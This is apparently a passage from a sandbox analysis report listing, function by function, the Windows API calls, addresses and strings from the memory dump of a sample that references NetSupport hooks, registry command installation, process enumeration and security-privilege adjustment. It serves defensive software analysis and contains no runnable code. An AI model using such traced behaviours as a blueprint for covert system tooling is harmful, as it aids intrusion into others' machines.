                                                                                          • String ID: "%spcinssui.exe" /ShowVideo "%%L"$$(b$%s=%s, err=%d$%s\command$%s\shell\show$8(b$Del %s, err=%d$Done InstallShowVideo.$H(b$InstallShowVideo %d$X(b$command$command=%s, err=%d
                                                                                          APIs
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005B60DE
                                                                                          • GetStockObject.GDI32(0000000F), ref: 005B60F2
                                                                                          • GetDC.USER32(00000000), ref: 005B6174
                                                                                          • SelectPalette.GDI32(00000000,?,00000000), ref: 005B6185
                                                                                          • RealizePalette.GDI32(00000000), ref: 005B618B
                                                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 005B61A6
                                                                                          • SelectPalette.GDI32(00000000,?,00000001), ref: 005B61BA
                                                                                          • RealizePalette.GDI32(00000000), ref: 005B61BD
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005B61C5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
                                                                                          • String ID: (
                                                                                          APIs
                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064), ref: 005ACBAC
                                                                                          • OpenProcess.KERNEL32(00100000,00000000,?), ref: 005ACBCF
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 005ACBDA
                                                                                          • ResetEvent.KERNEL32(?), ref: 005ACBEF
                                                                                          • ResetEvent.KERNEL32(?), ref: 005ACBF5
                                                                                          • SetEvent.KERNEL32(?), ref: 005ACBFB
                                                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 005ACC31
                                                                                          • SetEvent.KERNEL32(?), ref: 005ACC5D
                                                                                          • ResetEvent.KERNEL32(?), ref: 005ACC67
                                                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 005ACCC8
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 005ACD04
                                                                                          • wsprintfW.USER32 ref: 005ACD7A
                                                                                          • SetEvent.KERNEL32(FFFFCFC7), ref: 005ACDBA
                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064), ref: 005ACE02
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Event$Wait$Reset$MultipleObjectObjectsProcessSingle$CloseCurrentHandleOpenwsprintf
                                                                                          • String ID: ..\CTL32\ipc.cpp$cbdata=%d, datalen-sizeof=%d$deadshare$iffy result$no error$senderror$timeout
                                                                                          APIs
                                                                                          • GetWindowTextW.USER32(?,?,000000F0), ref: 005D8F4C
                                                                                          • wsprintfW.USER32 ref: 005D8F6D
                                                                                          • SetWindowTextW.USER32(?,?), ref: 005D8FB7
                                                                                          • GetDlgItemTextW.USER32(?,0000041C,?,000000F0), ref: 005D8FD5
                                                                                          • wsprintfW.USER32 ref: 005D8FEF
                                                                                          • SetDlgItemTextW.USER32(?,0000041C,?), ref: 005D903C
                                                                                          • GetDlgItemTextW.USER32(?,0000041D,?,000000F0), ref: 005D9054
                                                                                          • wsprintfW.USER32 ref: 005D9091
                                                                                          • SetDlgItemTextW.USER32(?,0000041D,?), ref: 005D90DE
                                                                                          • GetDlgItemTextW.USER32(?,0000041E,?,000000F0), ref: 005D9100
                                                                                          • wsprintfW.USER32 ref: 005D911B
                                                                                          • SetDlgItemTextW.USER32(?,0000041E,?), ref: 005D916C
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 005D917D
                                                                                          • EnableWindow.USER32(00000000), ref: 005D9180
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 005D918B
                                                                                          • ShowWindow.USER32(00000000), ref: 005D918E
                                                                                          • GetDlgItem.USER32(?,00000006), ref: 005D91B0
                                                                                          • EnableWindow.USER32(00000000), ref: 005D91B9
                                                                                          • GetDlgItem.USER32(?,00000006), ref: 005D91C0
                                                                                          • ShowWindow.USER32(00000000), ref: 005D91C9
                                                                                          • GetDlgItem.USER32(?,00000007), ref: 005D91D6
                                                                                          • EnableWindow.USER32(00000000), ref: 005D91D9
                                                                                          • GetDlgItem.USER32(?,00000007), ref: 005D91E6
                                                                                          • ShowWindow.USER32(00000000), ref: 005D91E9
                                                                                          • GetDlgItem.USER32(?,0000041E), ref: 005D91F9
                                                                                          • EnableWindow.USER32(00000000), ref: 005D91FC
                                                                                          • GetDlgItem.USER32(?,0000041E), ref: 005D920C
                                                                                          • ShowWindow.USER32(00000000), ref: 005D920F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Item$Window$Text$EnableShowwsprintf
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • IsWindow.USER32(?), ref: 005E08FE
                                                                                          • WaitForSingleObject.KERNEL32(?,0000000F), ref: 005E091A
                                                                                          • FindWindowExW.USER32(00000000,00000000,Shell_TrayWnd,00000000), ref: 005E0934
                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 005E0941
                                                                                          • ShowWindow.USER32(?,00000000), ref: 005E0954
                                                                                          • ShowWindow.USER32(?,00000005), ref: 005E0959
                                                                                          • WaitForSingleObject.KERNEL32(?,00000032), ref: 005E096A
                                                                                          • ResetEvent.KERNEL32(?), ref: 005E0978
                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8), ref: 005E0993
                                                                                          • GetProcAddress.KERNEL32(?,MyUnhook), ref: 005E09C5
                                                                                          • GetDesktopWindow.USER32 ref: 005E09EC
                                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 005E0A00
                                                                                          • OpenProcess.KERNEL32(00000600,00000000,?), ref: 005E0A19
                                                                                          • OpenProcess.KERNEL32(00000200,00000000,?), ref: 005E0A2E
                                                                                          • GetPriorityClass.KERNEL32(00000000), ref: 005E0A37
                                                                                          • SetPriorityClass.KERNEL32(00000000,00000080), ref: 005E0A4C
                                                                                          • GetDesktopWindow.USER32 ref: 005E0A58
                                                                                          • SendMessageW.USER32(00000000), ref: 005E0A5F
                                                                                          • Sleep.KERNEL32(000000FA,80000002,Software\NetSupport Ltd\winsthooks,00020219), ref: 005E0AAC
                                                                                          • SetPriorityClass.KERNEL32(00000000,00000000), ref: 005E0AB8
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 005E0ABF
                                                                                          • CloseHandle.KERNEL32(?), ref: 005E0ADD
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 005E0AEA
                                                                                          • CloseHandle.KERNEL32(?), ref: 005E0AF3
                                                                                          • FreeLibrary.KERNEL32(?), ref: 005E0B10
                                                                                            • Part of subcall function 00599770: FindWindowExW.USER32(00000000,00000000,Windows.UI.Core.CoreWindow,00000000), ref: 00599791
                                                                                            • Part of subcall function 00599770: GetWindowLongW.USER32(00000000,000000F0), ref: 005997A4
                                                                                            • Part of subcall function 00599770: DwmGetWindowAttribute.DWMAPI(00000000,0000000E,?,00000004), ref: 005997C2
                                                                                            • Part of subcall function 00599770: FindWindowExW.USER32(00000000,00000000,Windows.UI.Core.CoreWindow,00000000), ref: 00599839
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$CloseHandle$ClassFindObjectPriorityProcessSingleWait$DesktopLongOpenShow$AddressAttributeEventFreeLibraryMessageProcResetSendSleepThread
                                                                                          • String ID: MyUnhook$Software\NetSupport Ltd\winsthooks$Unhooking$UnloadDelay$Unloading %s
                                                                                          APIs
                                                                                            • Part of subcall function 005F299E: EncodePointer.KERNEL32(00000000,005FAD09,00642898,00000314,00000000,?,?,?,?,?,005EF35C,00642898,Microsoft Visual C++ Runtime Library,00012010), ref: 005F29A0
                                                                                          • LoadLibraryW.KERNEL32(USER32.DLL,00642898,00000314,00000000), ref: 005FAD1E
                                                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 005FAD3A
                                                                                          • EncodePointer.KERNEL32(00000000), ref: 005FAD4B
                                                                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 005FAD58
                                                                                          • EncodePointer.KERNEL32(00000000), ref: 005FAD5B
                                                                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 005FAD68
                                                                                          • EncodePointer.KERNEL32(00000000), ref: 005FAD6B
                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 005FAD78
                                                                                          • EncodePointer.KERNEL32(00000000), ref: 005FAD7B
                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 005FAD8C
                                                                                          • EncodePointer.KERNEL32(00000000), ref: 005FAD8F
                                                                                          • DecodePointer.KERNEL32(00000000,00642898,00000314,00000000), ref: 005FADB1
                                                                                          • DecodePointer.KERNEL32 ref: 005FADBB
                                                                                          • DecodePointer.KERNEL32(?,00642898,00000314,00000000), ref: 005FADFA
                                                                                          • DecodePointer.KERNEL32(?), ref: 005FAE14
                                                                                          • DecodePointer.KERNEL32(00642898,00000314,00000000), ref: 005FAE28
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Pointer$Encode$AddressDecodeProc$LibraryLoad
                                                                                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(psapi.dll,DE64E134,?,?,?,?,0061747B,000000FF), ref: 005DD130
                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 005DD1CB
                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 005DD249
                                                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 005DD274
                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 005DD2F0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoadOpenProcess
                                                                                          • String ID: %s has %s$.dll$.exe$C:\Windows\Installer\$EnumProcessModules$EnumProcesses$GetModuleFileNameExW$psapi.dll$shfolder.dll
                                                                                          APIs
                                                                                            • Part of subcall function 005E1540: LookupAccountNameW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 005E158E
                                                                                            • Part of subcall function 005E1540: GetLastError.KERNEL32 ref: 005E1598
                                                                                          • GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 005E2247
                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 005E22B7
                                                                                          • GetLastError.KERNEL32 ref: 005E22C1
                                                                                          • GetLengthSid.ADVAPI32(?), ref: 005E22E4
                                                                                          • GetLengthSid.ADVAPI32(?), ref: 005E22F6
                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 005E230A
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 005E2311
                                                                                          • InitializeAcl.ADVAPI32(00000000,?,00000002), ref: 005E231D
                                                                                          • GetLastError.KERNEL32 ref: 005E2327
                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 005E2369
                                                                                          • AddAce.ADVAPI32(00000000,00000002,000000FF,00000000,?), ref: 005E2393
                                                                                          • AddAuditAccessAce.ADVAPI32(00000000,00000002,?,?,?,?), ref: 005E23B8
                                                                                          • GetLastError.KERNEL32(?,00000002,?,?,?,?,?,00000002,000000FF,00000000,?), ref: 005E23C2
                                                                                          • LocalFree.KERNEL32(?,?,?,00000001), ref: 005E2435
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001), ref: 005E2442
                                                                                          • HeapFree.KERNEL32(00000000), ref: 005E2449
                                                                                            • Part of subcall function 005E15D0: GetCurrentProcess.KERNEL32(00000028,?), ref: 005E1600
                                                                                            • Part of subcall function 005E15D0: OpenProcessToken.ADVAPI32(00000000), ref: 005E1607
                                                                                            • Part of subcall function 005E15D0: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 005E161B
                                                                                            • Part of subcall function 005E15D0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 005E1647
                                                                                            • Part of subcall function 005E15D0: GetLastError.KERNEL32 ref: 005E1651
                                                                                            • Part of subcall function 005E15D0: CloseHandle.KERNEL32(?), ref: 005E165D
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$HeapProcess$FreeLengthLookupToken$AccessAccountAddressAdjustAllocAuditCloseCurrentHandleInformationInitializeLocalNameOpenPrivilegePrivilegesProcValue
                                                                                          • String ID: GetNamedSecurityInfoW$SetNamedSecurityInfoW$W
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(setupapi,005DCD69), ref: 005AEDF5
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiDestroyDeviceInfoList), ref: 005AEE22
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceRegistryPropertyW), ref: 005AEE34
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInfo), ref: 005AEE47
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsW), ref: 005AEE5A
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiDeleteDeviceInfo), ref: 005AEE6C
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiCallClassInstaller), ref: 005AEE7F
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiSetDeviceRegistryPropertyW), ref: 005AEE92
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiCreateDeviceInfoW), ref: 005AEEA4
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiCreateDeviceInfoList), ref: 005AEEB7
                                                                                            • Part of subcall function 005DF5E0: LoadStringW.USER32(00590000,000003F9,?,00000100), ref: 005DF60A
                                                                                            • Part of subcall function 005DF5E0: wvsprintfW.USER32(?,?,00000000), ref: 005DF622
                                                                                          Strings
                                                                                          • SetupDiEnumDeviceInfo, xrefs: 005AEE3C
                                                                                          • setupapi, xrefs: 005AEDF0
                                                                                          • SetupDiCreateDeviceInfoW, xrefs: 005AEE9E
                                                                                          • SetupDiCreateDeviceInfoList, xrefs: 005AEEAC
                                                                                          • SetupDiGetClassDevsW, xrefs: 005AEE4F
                                                                                          • SetupDiSetDeviceRegistryPropertyW, xrefs: 005AEE87
                                                                                          • SetupDiCallClassInstaller, xrefs: 005AEE74
                                                                                          • SetupDiGetDeviceRegistryPropertyW, xrefs: 005AEE2E
                                                                                          • SetupDiDeleteDeviceInfo, xrefs: 005AEE66
                                                                                          • SetupDiDestroyDeviceInfoList, xrefs: 005AEE1C
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Load$LibraryStringwvsprintf
                                                                                          • String ID: SetupDiCallClassInstaller$SetupDiCreateDeviceInfoList$SetupDiCreateDeviceInfoW$SetupDiDeleteDeviceInfo$SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInfo$SetupDiGetClassDevsW$SetupDiGetDeviceRegistryPropertyW$SetupDiSetDeviceRegistryPropertyW$setupapi
                                                                                          APIs
                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 005B0725
                                                                                          Similarity
                                                                                          • API ID: PathTemp
                                                                                          • String ID: Call Stack:%s$Details in file:$...(more)$Callstack:$ $%04d-%02d-%02d %02d:%02d:%02d.%03d, Win%s %d.%d$NOT copied to disk$Support\$copied to %s
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,005ED3F0), ref: 005F2D56
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 005F2D78
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 005F2D85
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 005F2D92
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 005F2D9F
                                                                                          • TlsAlloc.KERNEL32(?,005ED3F0), ref: 005F2DEF
                                                                                          • TlsSetValue.KERNEL32(00000000,?,005ED3F0), ref: 005F2E0A
                                                                                          • EncodePointer.KERNEL32(?,005ED3F0), ref: 005F2E25
                                                                                          • EncodePointer.KERNEL32(?,005ED3F0), ref: 005F2E32
                                                                                          • EncodePointer.KERNEL32(?,005ED3F0), ref: 005F2E3F
                                                                                          • EncodePointer.KERNEL32(?,005ED3F0), ref: 005F2E4C
                                                                                          • DecodePointer.KERNEL32(Function_00062BA5,?,005ED3F0), ref: 005F2E6D
                                                                                          • DecodePointer.KERNEL32(00000000,?,005ED3F0), ref: 005F2E9C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F2EAE
                                                                                            • Part of subcall function 005F2A21: DecodePointer.KERNEL32(00000006,005F2EC4,?,005ED3F0), ref: 005F2A32
                                                                                            • Part of subcall function 005F2A21: TlsFree.KERNEL32(00000016,005F2EC4,?,005ED3F0), ref: 005F2A4C
                                                                                            • Part of subcall function 005F2A21: DeleteCriticalSection.KERNEL32(00000000,00000000,77485730,?,005F2EC4,?,005ED3F0), ref: 005F91BF
                                                                                            • Part of subcall function 005F2A21: DeleteCriticalSection.KERNEL32(00000016,77485730,?,005F2EC4,?,005ED3F0), ref: 005F91E9
                                                                                          Similarity
                                                                                          • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue
                                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                          APIs
                                                                                          • GetClassNameW.USER32(?,?,00000080), ref: 005BE0D7
                                                                                          • EnumChildWindows.USER32(?,Function_0002DF40,?), ref: 005BE229
                                                                                          • GetClassNameW.USER32(?,?,00000040), ref: 005BE33B
                                                                                          • GetWindowRect.USER32(?,?), ref: 005BE3D6
                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 005BE44A
                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?), ref: 005BE45D
                                                                                          • LoadLibraryW.KERNEL32(psapi.dll), ref: 005BE472
                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 005BE4B1
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BE4D5
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 005BE4DC
                                                                                          • FreeLibrary.KERNEL32(?), ref: 005BE4ED
                                                                                          • PostMessageW.USER32(?,00000200,00000000,00050005), ref: 005BE505
                                                                                          • PostMessageW.USER32(?,00000201,00000000,00050005), ref: 005BE513
                                                                                          • PostMessageW.USER32(?,00000202,00000000,00050005), ref: 005BE521
                                                                                          Similarity
                                                                                          • API ID: MessagePost$ClassLibraryNameProcessWindow$AddressChildCloseEnumErrorFreeHandleLastLoadOpenProcRectThreadWindows
                                                                                          • String ID: #32770$Button$GetModuleFileNameExW$psapi.dll
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(netapi32.dll), ref: 005CCA05
                                                                                          • GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 005CCA36
                                                                                          • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 005CCA44
                                                                                          • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 005CCA52
                                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 005CCAA3
                                                                                          • GetTickCount.KERNEL32 ref: 005CCB10
                                                                                          • GetTickCount.KERNEL32 ref: 005CCB33
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Similarity
                                                                                          • API ID: AddressProc$CountTick$LibraryLoadNameUser
                                                                                          • String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
                                                                                          APIs
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005B82EE
                                                                                            • Part of subcall function 005B6BB0: GetDC.USER32(00000000), ref: 005B6BB7
                                                                                          • GetSysColor.USER32(00000010), ref: 005B831C
                                                                                          • DeleteObject.GDI32(00000000), ref: 005B835D
                                                                                          • GlobalLock.KERNEL32(?), ref: 005B836D
                                                                                          • GlobalLock.KERNEL32(?), ref: 005B8376
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 005B8431
                                                                                          • GlobalFree.KERNEL32(?), ref: 005B843A
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 005B8440
                                                                                          • GlobalFree.KERNEL32(?), ref: 005B8446
                                                                                            • Part of subcall function 005C2410: GetObjectW.GDI32(?,00000018,?), ref: 005C2423
                                                                                            • Part of subcall function 005C2410: CreateCompatibleDC.GDI32(00000000), ref: 005C2431
                                                                                            • Part of subcall function 005C2410: CreateCompatibleDC.GDI32(00000000), ref: 005C2436
                                                                                            • Part of subcall function 005C2410: SelectObject.GDI32(00000000,00000000), ref: 005C244E
                                                                                            • Part of subcall function 005C2410: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 005C2461
                                                                                            • Part of subcall function 005C2410: SelectObject.GDI32(00000000,00000000), ref: 005C246C
                                                                                            • Part of subcall function 005C2410: SetBkColor.GDI32(00000000,00000000), ref: 005C2476
                                                                                            • Part of subcall function 005C2410: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 005C2493
                                                                                            • Part of subcall function 005C2410: SetBkColor.GDI32(00000000,00000000), ref: 005C249C
                                                                                            • Part of subcall function 005C2410: SetTextColor.GDI32(00000000,00FFFFFF), ref: 005C24A8
                                                                                            • Part of subcall function 005C2410: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 005C24C5
                                                                                            • Part of subcall function 005C2410: SetBkColor.GDI32(00000000,005B700B), ref: 005C24D0
                                                                                            • Part of subcall function 005C2410: SetTextColor.GDI32(00000000,00000000), ref: 005C24D9
                                                                                            • Part of subcall function 005C2410: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 005C24F6
                                                                                            • Part of subcall function 005C2410: SelectObject.GDI32(00000000,00000000), ref: 005C2501
                                                                                          • DeleteObject.GDI32(?), ref: 005B8467
                                                                                          Similarity
                                                                                          • API ID: Object$ColorGlobal$CreateSelect$CompatibleDeleteFreeLockTextUnlock$Bitmap
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005C2423
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005C2431
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005C2436
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005C244E
                                                                                          • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 005C2461
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005C246C
                                                                                          • SetBkColor.GDI32(00000000,00000000), ref: 005C2476
                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 005C2493
                                                                                          • SetBkColor.GDI32(00000000,00000000), ref: 005C249C
                                                                                          • SetTextColor.GDI32(00000000,00FFFFFF), ref: 005C24A8
                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 005C24C5
                                                                                          • SetBkColor.GDI32(00000000,005B700B), ref: 005C24D0
                                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 005C24D9
                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 005C24F6
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005C2501
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005C2508
